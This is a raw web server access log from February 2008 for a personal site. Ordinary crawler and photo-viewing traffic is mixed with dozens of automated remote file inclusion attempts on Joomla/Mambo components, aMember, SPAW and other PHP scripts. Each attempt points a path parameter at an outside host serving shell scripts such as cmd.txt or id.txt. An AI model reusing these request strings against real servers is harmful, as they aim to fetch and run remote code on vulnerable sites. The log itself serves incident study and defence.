208.100.19.241 - - [19/Feb/2008:09:10:01 -0800] "GET //?dir=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:09:10:13 -0800] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:09:10:14 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:10:54 -0800] "GET /logs/access_080117.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:10:54 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:10:54 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.135 - - [19/Feb/2008:09:11:31 -0800] "GET /bikes/GPS/WeSTOC2006/ HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.208.78.80 - - [19/Feb/2008:09:12:01 -0800] "GET /logs/omponents/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
88.208.78.80 - - [19/Feb/2008:09:12:02 -0800] "GET /omponents/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bpec-english.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:12:04 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:12:04 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:12:04 -0800] "GET /logs/access_071222.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:12:08 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:12:11 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:12:13 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:12:13 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.113 - - [19/Feb/2008:09:12:54 -0800] "GET /plans/A2_MASTER_SUITE_PLAN.pdf HTTP/1.0" 200 2297833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:09:13:35 -0800] "GET /logs/access_080105.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:09:13:35 -0800] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.4.3 - - [19/Feb/2008:09:13:35 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://landleben.bieswang.de/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:09:13:51 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:14:17 -0800] "GET /logs/access_071225.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:09:14:20 -0800] "GET /logs/access_071225.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.160.11.72 - - [19/Feb/2008:09:14:21 -0800] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:16 -0800] "GET //config.php?_CCFG[_PKG_PATH_DBSE]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:16 -0800] "GET /logs//config.php?_CCFG[_PKG_PATH_DBSE]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:22 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:25 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
74.6.26.29 - - [19/Feb/2008:09:15:26 -0800] "GET /logs/access_071113.log HTTP/1.0" 200 4345 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:15:31 -0800] "GET //lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:37 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:15:43 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:16:53 -0800] "GET /logs//config.php?_CCFG[_PKG_PATH_DBSE]=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
207.58.184.170 - - [19/Feb/2008:09:16:58 -0800] "GET //config.php?_CCFG[_PKG_PATH_DBSE]=http://systemiker.org/ziegler/redaxo/final.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:17:25 -0800] "GET /logs/access_080117.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:17:26 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.237.136.246 - - [19/Feb/2008:09:17:26 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.biscocanada.com/board//data/trade/1188498966/101/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:09:17:35 -0800] "GET //includes/class_template.php?phpbb_root_path=http://www.sonarama.com/1.0/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.230 - - [19/Feb/2008:09:17:54 -0800] "GET /minamijewelry/?M=D HTTP/1.0" 200 2094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.24.251.240 - - [19/Feb/2008:09:18:37 -0800] "GET /logs/access_070716.log HTTP/1.1" 200 34661 "http://uk.search.yahoo.com/search?p=62.24.251.240&ei=UTF-8&rd=r1&fr=yfp-t-501&xargs=0&pstart=1&b=11" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; 811TBSTE(0); Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:09:19:11 -0800] "GET /logs/access_080129.log//?dir=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:09:19:11 -0800] "GET /logs//?dir=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 35992 "-" "libwww-perl/5.805" "www.dmulk.com"
58.65.169.46 - - [19/Feb/2008:09:19:30 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:20:32 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:20:49 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.36.35 - - [19/Feb/2008:09:20:52 -0800] "GET /logs/access.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://razzybailey.com/gallery/ok.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:20:52 -0800] "GET //lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.168.250.60 - - [19/Feb/2008:09:21:28 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.168.250.60 - - [19/Feb/2008:09:21:29 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.168.250.60 - - [19/Feb/2008:09:21:31 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.52.238.34 - - [19/Feb/2008:09:21:55 -0800] "GET /logs/access.log//stats24a2296796cb7a5ba8e2ee8ee5745e75/index-path.txt/skin/zero_vote/components/com_extcalendar/administrator/components/index.phphttp://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:22:18 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:22:22 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:23:38 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:23:38 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:23:39 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.144.21.234 - - [19/Feb/2008:09:24:52 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.antik-glas-huber.de/photokorn//images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/Feb/2008:09:24:59 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://yudz.110mb.com/docs/heer.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:09:25:01 -0800] "GET /logs/access_071228.log//?dir=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:09:25:44 -0800] "GET /logs//encapscms_PATH/core/core.php?root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:09:25:45 -0800] "GET //encapscms_PATH/core/core.php?root=http://mosquitomagnetreview.com/gallery2.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
213.144.21.234 - - [19/Feb/2008:09:26:12 -0800] "GET //lazarusgb/admin.php?include_path=http://www.antik-glas-huber.de/photokorn//images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.144.21.234 - - [19/Feb/2008:09:26:12 -0800] "GET //lazarusgb/admin.php?include_path=http://www.antik-glas-huber.de/photokorn//images/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:26:31 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:26:31 -0800] "GET //lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:26:32 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:26:52 -0800] "GET /bikes/dteel/2008_02_15/IMG_4519s.JPG HTTP/1.1" 200 208989 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:26:53 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.60.132.199 - - [19/Feb/2008:09:26:58 -0800] "GET /logs/access_080121.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.zuuniimedee.mn///modules/My_eGallery/data/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:27:01 -0800] "GET /bikes/dteel/2008_02_16/IMG_4524s.JPG HTTP/1.1" 200 229589 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:27:04 -0800] "GET /bikes/dteel/2008_02_16/IMG_4536s.JPG HTTP/1.1" 200 85494 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
222.255.3.68 - - [19/Feb/2008:09:27:14 -0800] "GET /logs/access_080201.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [19/Feb/2008:09:27:15 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:27:20 -0800] "GET /bikes/dteel/2008_02_16/IMG_4557s.JPG HTTP/1.1" 200 232435 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
222.255.3.68 - - [19/Feb/2008:09:27:30 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [19/Feb/2008:09:27:40 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://onlypets.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:27:51 -0800] "GET /bikes/dteel/2008_02_16/IMG_4543s.JPG HTTP/1.1" 200 257277 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:28:18 -0800] "GET /bikes/dteel/2008_02_16/IMG_4525s.JPG HTTP/1.1" 200 275808 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:28:34 -0800] "GET /bikes/dteel/2008_02_15/IMG_4516s.JPG HTTP/1.1" 200 250958 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:41 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:42 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:28:42 -0800] "GET /bikes/dteel/2008_02_16/IMG_4547s.JPG HTTP/1.1" 200 244678 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:47 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:49 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:53 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:55 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:59 -0800] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:28:59 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
86.40.120.110 - - [19/Feb/2008:09:29:04 -0800] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?p=383524#post383524" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:29:20 -0800] "GET /bikes/dteel/2008_02_15/IMG_4501s.JPG HTTP/1.1" 200 323465 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:29:32 -0800] "GET /bikes/dteel/2008_02_16/IMG_4527s.JPG HTTP/1.1" 200 327693 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
166.197.171.179 - - [19/Feb/2008:09:29:40 -0800] "GET /bikes/dteel/2008_02_15/IMG_4522s.JPG HTTP/1.1" 200 292217 "http://www.st-owners.com/forums/showthread.php?t=35714&page=2" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420.1 (KHTML, like Gecko) Version/3.0 Mobile/4A93 Safari/419.3" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:09:30:11 -0800] "GET /logs/access_080211.log//?dir=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:09:31:06 -0800] "GET /logs//encapscms_PATH/core/core.php?root=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.214.82 - - [19/Feb/2008:09:31:07 -0800] "GET //encapscms_PATH/core/core.php?root=http://revolution.helloweb.eu/silvio.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.174.65.31 - - [19/Feb/2008:09:31:27 -0800] "GET /logs/access_071230.log/modules/tinycontent/admin/index.php?spaw_root=http://www.kullebo.dk/components/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:09:31:31 -0800] "GET /logs/access_071230.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.222.81 - - [19/Feb/2008:09:32:19 -0800] "GET /logs/access_071225.log/admin/editeur/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [19/Feb/2008:09:32:31 -0800] "GET /logs/access_080122.log//include.php?path[docroot]=http://www.cartographia.org/administrator/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.223.90 - - [19/Feb/2008:09:32:32 -0800] "GET //include.php?path[docroot]=http://www.cartographia.org/administrator/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
